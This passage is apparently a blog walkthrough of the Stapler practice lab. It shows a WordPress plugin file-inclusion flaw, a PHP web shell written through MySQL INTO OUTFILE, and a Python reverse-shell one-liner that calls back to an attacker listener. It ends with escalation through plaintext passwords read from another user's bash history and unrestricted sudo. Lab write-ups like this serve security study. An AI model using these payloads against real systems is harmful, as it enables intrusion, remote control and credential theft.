<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo apt-get install -y default-mysql-client</span><br><span class="line">Reading package lists... Done</span><br><span class="line">Building dependency tree... Done</span><br><span class="line">Reading state information... Done</span><br><span class="line">...</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>With the client installed, let’s connect to the database.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ mysql -u root -pplbkac -D wordpress -h 192.168.120.138</span><br><span class="line">Reading table information for completion of table and column names</span><br><span class="line">You can turn off this feature to get a quicker startup with -A</span><br><span class="line">...</span><br><span class="line">MySQL [wordpress]&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Seeing as we are the root user in the database, let’s try writing files to disk. Specifically, we’ll try writing this simple PHP web shell:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo shell_exec($_GET[&#x27;cmd&#x27;]);?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We’ll write the shell to the <strong>&#x2F;uploads</strong> directory where we can access it. However, we do not know the absolute path of that directory in the target’s file system. We can try to utilize the LFI vulnerability again to fetch a default Apache configuration file. Since the application is being hosted via HTTPS, the file we are interested in would be <strong>&#x2F;etc&#x2F;apache2&#x2F;sites-available&#x2F;default-ssl.conf</strong>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k &quot;https://192.168.120.138:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&amp;title=987654321&amp;short=1&amp;term=1&amp;thumb=/etc/apache2/sites-available/default-ssl.conf&quot;</span><br><span class="line">https://192.168.120.138:12380/blogblog/?p=230</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Checking the <strong>&#x2F;uploads</strong> directory again shows that our file <strong>328122631.jpeg</strong> has arrived.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/uploads/ | html2text</span><br><span class="line">****** Index of /blogblog/wp-content/uploads ******</span><br><span class="line">[[ICO]]       Name             Last_modified    Size Description</span><br><span class="line">===========================================================================</span><br><span class="line">[[PARENTDIR]] Parent_Directory                   -</span><br><span class="line">[[IMG]]       328122631.jpeg   2021-06-09 14:01 6.2K</span><br><span class="line">[[IMG]]       1994039340.jpeg  2021-06-09 13:22 3.0K</span><br><span class="line">===========================================================================</span><br><span class="line">     Apache/2.4.18 (Ubuntu) Server at 192.168.120.138 Port 12380</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Let’s retrieve it and find out the web root of the server.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/uploads/328122631.jpeg --output default-ssl.conf</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ grep DocumentRoot default-ssl.conf</span><br><span class="line">                DocumentRoot /var/www/https</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We found that the web root is located in <strong>&#x2F;var&#x2F;www&#x2F;https</strong>. Therefore, our final query to write the shell would look like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">MySQL [wordpress]&gt; SELECT &quot;&lt;?php echo shell_exec($_GET[&#x27;cmd&#x27;]);?&gt;&quot; INTO OUTFILE &quot;/var/www/https/blogblog/wp-content/uploads/shell.php&quot;;</span><br><span class="line">Query OK, 1 row affected (0.031 sec)</span><br><span class="line"></span><br><span class="line">MySQL [wordpress]&gt; quit</span><br><span class="line">Bye</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Looks like the shell was written to disk successfully. Let’s navigate to it and test remote command execution.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k &quot;https://192.168.120.138:12380/blogblog/wp-content/uploads/shell.php?cmd=id&quot;</span><br><span class="line"></span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Great, we have obtained RCE. The next step is to get a reverse shell. We can utilize a python reverse shell payload one-liner.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.118.5&quot;,666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>URL-encoding this payload gives us the following:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.118.5%22%2C666))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Let’s set up a Netcat listener on port 666.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nc -lvp 666</span><br><span class="line">listening on [any] 666 ...</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We’ll trigger the reverse shell with the following request.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k &quot;https://192.168.120.138:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.118.5%22%2C666))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27&quot;</span><br><span class="line">...</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Our Netcat listener should catch the reverse shell.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nc -lvp 666</span><br><span class="line">listening on [any] 666 ...</span><br><span class="line">192.168.120.138: inverse host lookup failed: Unknown host</span><br><span class="line">connect to [192.168.118.5] from (UNKNOWN) [192.168.120.138] 38886</span><br><span class="line">/bin/sh: 0: can&#x27;t access tty; job control turned off</span><br><span class="line">$ id</span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Escalation"><a href="#Escalation" class="headerlink" title="Escalation"></a><strong>Escalation</strong></h2><h3 id="Bash-History-Enumeration"><a href="#Bash-History-Enumeration" class="headerlink" title="Bash History Enumeration"></a><strong>Bash History Enumeration</strong></h3><p>We’ll begin local enumeration by listing system users.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">$ ls -l /home</span><br><span class="line">total 120</span><br><span class="line">drwxr-xr-x 2 AParnell   AParnell   4096 May  5 23:56 AParnell</span><br><span class="line">drwxr-xr-x 2 CCeaser    CCeaser    4096 Jun  5  2016 CCeaser</span><br><span class="line">drwxr-xr-x 2 CJoo       CJoo       4096 May  5 23:56 CJoo</span><br><span class="line">drwxr-xr-x 2 DSwanger   DSwanger   4096 May  5 23:56 DSwanger</span><br><span class="line">drwxr-xr-x 2 Drew       Drew       4096 May  5 23:56 Drew</span><br><span class="line">drwxr-xr-x 2 ETollefson ETollefson 4096 May  5 23:56 ETollefson</span><br><span class="line">drwxr-xr-x 2 Eeth       Eeth       4096 Jun  5  2016 Eeth</span><br><span class="line">drwxr-xr-x 2 IChadwick  IChadwick  4096 Jun  5  2016 IChadwick</span><br><span class="line">drwxr-xr-x 2 JBare      JBare      4096 May  5 23:56 JBare</span><br><span class="line">drwxr-xr-x 2 JKanode    JKanode    4096 May  5 23:56 JKanode</span><br><span class="line">drwxr-xr-x 2 JLipps     JLipps     4096 May  5 23:56 JLipps</span><br><span class="line">drwxr-xr-x 2 LSolum     LSolum     4096 May  5 23:56 LSolum</span><br><span class="line">drwxr-xr-x 2 LSolum2    LSolum2    4096 Jun  5  2016 LSolum2</span><br><span class="line">drwxr-xr-x 2 MBassin    MBassin    4096 May  5 23:56 MBassin</span><br><span class="line">drwxr-xr-x 2 MFrei      MFrei      4096 May  5 23:56 MFrei</span><br><span class="line">drwxr-xr-x 2 NATHAN     NATHAN     4096 May  5 23:56 NATHAN</span><br><span class="line">drwxr-xr-x 2 RNunemaker RNunemaker 4096 May  5 23:56 RNunemaker</span><br><span class="line">drwxr-xr-x 2 SHAY       SHAY       4096 May  5 23:56 SHAY</span><br><span class="line">drwxr-xr-x 2 SHayslett  SHayslett  4096 May  5 23:56 SHayslett</span><br><span class="line">drwxr-xr-x 2 SStroud    SStroud    4096 May  5 23:56 SStroud</span><br><span class="line">drwxr-xr-x 2 Sam        Sam        4096 Jun  5  2016 Sam</span><br><span class="line">drwxr-xr-x 2 Taylor     Taylor     4096 May  5 23:56 Taylor</span><br><span class="line">drwxr-xr-x 2 elly       elly       4096 May  5 23:56 elly</span><br><span class="line">drwxr-xr-x 2 jamie      jamie      4096 May  5 23:56 jamie</span><br><span class="line">drwxr-xr-x 2 jess       jess       4096 May  5 23:56 jess</span><br><span class="line">drwxr-xr-x 2 kai        kai        4096 May  5 23:56 kai</span><br><span class="line">drwxr-xr-x 2 mel        mel        4096 May  5 23:56 mel</span><br><span class="line">drwxr-xr-x 3 peter      peter      4096 May  5 23:56 peter</span><br><span class="line">drwxrwxrwx 2 www        www        4096 Jun  5  2016 www</span><br><span class="line">drwxr-xr-x 3 zoe        zoe        4096 May  5 23:56 zoe</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The target has quite a few users on the system. Usually, we should not be able to read files in other users’ home directories, but this system was misconfigured to allow this. We’ll go down this list and enumerate every user’s directory.</p>
<p>The user <code>JKanode</code> did not clear their bash history, and we can see some SSH login attempts on localhost including plaintext passwords for users <code>JKanode</code> and <code>peter</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ cat /home/JKanode/.bash_history</span><br><span class="line">id</span><br><span class="line">whoami</span><br><span class="line">ls -lah</span><br><span class="line">pwd</span><br><span class="line">ps aux</span><br><span class="line">sshpass -p thisimypassword ssh JKanode@localhost</span><br><span class="line">apt-get install sshpass</span><br><span class="line">sshpass -p JZQuyIN5 ssh peter@localhost</span><br><span class="line">ps -ef</span><br><span class="line">top</span><br><span class="line">kill -9 3747</span><br><span class="line">exit</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We’ll pick the latter one and try to log in as <code>peter:JZQuyIN5</code>. First though, we need to spawn a proper TTY shell. Otherwise, we’d get the following terminal error.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ su peter</span><br><span class="line">su: must be run from a terminal</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Let’s spawn a bash shell with python and then try to log in again.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br><span class="line">www-data@red:/var/www/https/blogblog/wp-content/uploads$ su peter</span><br><span class="line">su peter</span><br><span class="line">Password: JZQuyIN5</span><br><span class="line"></span><br><span class="line">red% id</span><br><span class="line">id</span><br><span class="line">uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The credentials work, and we are able to successfully log in.</p>
<h3 id="Unrestricted-Sudo"><a href="#Unrestricted-Sudo" class="headerlink" title="Unrestricted Sudo"></a><strong>Unrestricted Sudo</strong></h3><p>Having logged in as Peter, we’ll check our <code>sudo</code> permissions.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">red% sudo -l</span><br><span class="line">sudo -l</span><br><span class="line"></span><br><span class="line">We trust you have received the usual lecture from the local System</span><br><span class="line">Administrator. It usually boils down to these three things:</span><br><span class="line"></span><br><span class="line">    #1) Respect the privacy of others.</span><br><span class="line">    #2) Think before you type.</span><br><span class="line">    #3) With great power comes great responsibility.</span><br><span class="line"></span><br><span class="line">[sudo] password for peter: JZQuyIN5</span><br><span class="line"></span><br><span class="line">Matching Defaults entries for peter on red:</span><br><span class="line">    lecture=always, env_reset, mail_badpass,</span><br><span class="line">    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User peter may run the following commands on red:</span><br><span class="line">    (ALL : ALL) ALL</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>It looks like Peter has unrestricted <code>sudo</code> access, allowing us to easily spawn a root shell.</p>

    </div>

    
    
    
        

  <div class="followme">
    <p>Welcome to my other publishing channels</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="https://twitter.com/2zCub11p">
            <span class="icon">
              <i class="fab fa-twitter"></i>
            </span>

            <span class="label">Twitter</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="https://t.me/channel_name">
            <span class="icon">
              <i class="fab fa-telegram"></i>
            </span>

            <span class="label">Telegram</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/07/01/hello-world/" rel="prev" title="Hello World">
      <i class="fa fa-chevron-left"></i> Hello World
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Exploitation-Guide-for-Stapler"><span class="nav-number">1.</span> <span class="nav-text">Exploitation Guide for Stapler</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Summary"><span class="nav-number">1.1.</span> <span class="nav-text">Summary</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Enumeration"><span class="nav-number">1.2.</span> <span class="nav-text">Enumeration</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Nmap"><span class="nav-number">1.2.1.</span> <span class="nav-text">Nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Curl"><span class="nav-number">1.2.2.</span> <span class="nav-text">Curl</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Nikto"><span class="nav-number">1.2.3.</span> <span class="nav-text">Nikto</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WordPress-Plugin-Enumeration"><span class="nav-number">1.2.4.</span> <span class="nav-text">WordPress Plugin Enumeration</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploitation"><span class="nav-number">1.3.</span> <span class="nav-text">Exploitation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#WordPress-Plugin-Local-File-Inclusion-Vulnerability"><span class="nav-number">1.3.1.</span> <span class="nav-text">WordPress Plugin Local File Inclusion Vulnerability</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Remote-Code-Execution-via-MySQL-Database-File-Write"><span class="nav-number">1.3.2.</span> <span class="nav-text">Remote Code Execution via MySQL Database File Write</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Escalation"><span class="nav-number">1.4.</span> <span class="nav-text">Escalation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Bash-History-Enumeration"><span class="nav-number">1.4.1.</span> <span class="nav-text">Bash History Enumeration</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Unrestricted-Sudo"><span class="nav-number">1.4.2.</span> <span class="nav-text">Unrestricted Sudo</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Swan"
      src="/images/55.jpg">
  <p class="site-author-name" itemprop="name">Swan</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:sevionz@aims.edu" title="E-Mail → mailto:sevionz@aims.edu" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/2zCub11p" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;2zCub11p" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://studio.youtube.com/channel/UCJnYTRtVCkrauRupyjPqjCQ" title="YouTube → https:&#x2F;&#x2F;studio.youtube.com&#x2F;channel&#x2F;UCJnYTRtVCkrauRupyjPqjCQ" rel="noopener" target="_blank"><i class="fab fa-youtube fa-fw"></i>YouTube</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Swan</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
